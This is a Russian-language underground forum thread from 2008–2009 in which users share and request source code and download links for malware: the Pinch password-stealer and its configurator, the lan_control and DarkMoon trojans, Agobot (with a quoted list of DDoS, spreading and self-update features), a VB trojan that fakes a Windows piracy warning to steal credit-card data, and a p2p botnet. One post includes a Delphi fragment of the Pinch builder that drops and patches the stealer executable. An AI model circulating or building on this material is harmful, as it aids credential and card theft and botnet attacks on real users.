Сообщений в теме: 19

[###]

Пожалуй начну я  :blushing:
Исходник конфигуратора пинча 2.99 от сталина:

и
Исходник трояна lan_control:

[###]

Начну как всегда я B)
Под хайдом исходник трояна DarkMoon v4.11

Agobot
]]>http://www.avira.com...bot.100864.html]]>

Цитата

– Вредоносная программа обладает способностью выполнять следующие действия:
• Начать DDoS SYN атаку
• Запускается DDoS TCP атака
• Запускается DDoS UDP атака
• Отключить сетевые папки общего доступа
• разорвать соединение с IRC сервером
• Загрузить файл
• Редактировать реестр
• Подключить сетевые папки общего доступа
• Запустить файл
• Войти в чат-комнату IRC
• Покинуть чат-комнату IRC
• Произвести DDoS атаку
• Проверка сети
• Перенаправить порт
• Запуск процедуры распространения
• Обновляется самостоятельно
• Загрузить файл
• Посещение веб-страницы

Огромный размер из-за, того что в состав бота идут объектные файлы.

[###]

CC Trojan
Трой написан на VB. Смысл в следующем:
Вылазит окно, что винда пиратская и просит ввести данные кредитки для легализации. После ввода данных, они отправляются на гейт ;)

[DEN-009]

Исходник пинча для дельфи?

[DEN-009]

Переупакую исходник на пинча, плз!

И если можна дай ссылку на 7-zip.
(кажется сдесь 80% кпаковано этим архиватором)

[$iD]

DEN-009

Цитата

И если можна дай ссылку на 7-zip.

]]>Тут]]>

[DEN-009]

Там ведь не полный комплект!
В архиве лежит один файл Unit_PINCH.pas

[$iD]

DEN-009
А что тебе еще надо?

[x45x50]

to ### ты сам то смотрел что выложил? ты выложил исходники конфигуратора.

[DEN-009]

Мне надо Unit_PINCH.dfm

[DEN-009]

Посмотрел исходник DarkMoon v4.11, там есть элементы
TTeGroupBox;
TTeButton;
TTeLabel;
.....
У меня нет такой беблиотеки, я даже незнаю как она называется.
Пробовал гуглить не чего хорошего не нашол, если есть у кого скинте ссылочку ны эту библиотеку.

[DEN-009]

Ты посмотри исходник, он на дельфи.

[Pernat1y]

DEN-009 (14.9.2008, 14:21) писал:

Ты посмотри исходник, он на дельфи.

это редактор скомпиленого пинча. сам пинч на асме

[DEN-009]

Ты посмотри там исходники на асме есть.
Там вообще только 1 компонент.

[Pernat1y]

DEN-009 (14.9.2008, 19:17) писал:

Ты посмотри там исходники на асме есть.
Там вообще только 1 компонент.

оно дропает скомпиленный пинч из ресурсов и редактирует его на твои настройки
если тебе еще что-то не ясно, то продолжай поиски пинча на делфях

...
{$R Resources.res}
...
//извлечение ресурсов
procedure ExtractRes(ResType, ResName, ResNewName : String);
var
Res : TResourceStream;
Begin
Res:=TResourceStream.Create(Hinstance, Resname, Pchar(ResType));
Res.SavetoFile(ResNewName);
Res.Free;
end;
...
//редактирование ехе
procedure TForm1.spSkinButton3Click(Sender: TObject);
var
hFile : THandle;
dwTemp : Cardinal;
bZero : char;
a: string;
b, c, s:integer;
begin
ExtractRes('EXEFILE', 'File', 'Pinch.exe');
hFile := CreateFile('Pinch.EXE',GENERIC_WRITE,0,nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if hFile <> INVALID_HANDLE_VALUE then
begin
...
//запись данных в файл
SetFilePointer(hFile, StrToInt(Edit2.Text), nil, 0);
WriteFile(hFile, PChar(Edit66.Text)^, Length(Edit66.Text), dwTemp, nil);
SetFilePointer(hFile, StrToInt(Edit12.Text), nil, 0);
WriteFile(hFile, PChar(spSkinEdit2.Text)^, Length(spSkinEdit2.Text), dwTemp, nil);
if dwTemp = 0 then ShowMessage('Ошибка записи =\');
bZero := #0;
WriteFile(hFile, bZero, 0, dwTemp, nil);
CloseHandle( hFile );
...

[MYSTiQUE]

Исходник Pinch 3.01

[Pernat1y]

MYSTiQUE (11.2.2009, 8:57) писал:

Исходник Pinch 3.01

не, ну блин. человеки, вы вообще отличаете сорцы самого пинча, от сорцов билдера или, в данном случае, конфигуратора?
захексите data.RES, если кто сомневаеться

[labvictx]

]]>http://www.megaupload.com/?d=XNVW7W5I]]>

[labvictx]

p2p botnet - Source (mostly complete)
]]>http://www.mediafire...1wdq1o076amww03]]>

[ajak]

1

А где мон взять пинча исходники?)